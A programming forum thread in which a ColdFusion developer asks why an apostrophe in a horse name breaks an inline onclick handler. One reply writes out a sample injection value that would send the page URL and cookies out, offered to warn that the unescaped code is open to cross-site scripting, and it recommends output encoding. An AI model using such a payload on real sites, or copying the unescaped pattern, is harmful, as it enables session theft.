
Single quote is breaking my onclick action 1


LyndonOHRC

Programmer
Sep 8, 2005
I'm trying to populate an input tag when text is clicked. It works great until the data contains an apostrophe, i.e. the value (DANCER'S CALL) is placed in the function dynamically by my server-side database code. I'm having trouble figuring out how to solve the unbalanced delimiters this scenario presents. Any help appreciated.

Code:
onclick='document.getElementById("HorseName").value="DANCER'S CALL";
document.getElementById("HorseName").focus();'

In case it helps, here's the ColdFusion Server side code that builds the onclick action:

Code:
<span onclick='document.getElementById("HorseName").value="#getHName.hname#";document.getElementById("HorseName").focus();'>
    #getHName.hname#
</span>




Lyndon
 
Hi

And if getHName.hname's value is ";$.get("",{"u":location.href,"c":document.cookie});//, then your site will obediently send the URL and cookies to an attacker?

According to the documentation you should use encodeForHTML(). I guess something like this:
Code:
<span onclick='document.getElementById("HorseName").value="#encodeForHTML(getHName.hname)#";document.getElementById("HorseName").focus();'>
#encodeForHTML(getHName.hname)#
</span>

Feherke.
feherke.github.io
 
Security: The dynamic value can only be a horse name from our internal database. And the application is not available to the public.

We use ColdFusion 9 and encodeForHTML is not available, sorry I didn't think to post the version.

I even tried passing the horse name to a function, no luck.

Code:
function putHName(hname) {
    document.getElementById("HorseName").value = hname;
    document.getElementById("HorseName").focus();
}

Lyndon
 
Hi

No problem, I have absolutely no idea about ColdFusion or its versions. This is a generic issue and should be addressed regardless of language, version, data source or site accessibility.

Though there is a chance ColdFusion's function does not encode the single quote too. So go the manual way, and replace "'" with "&apos;" in getHName.hname.


Feherke.
feherke.github.io
 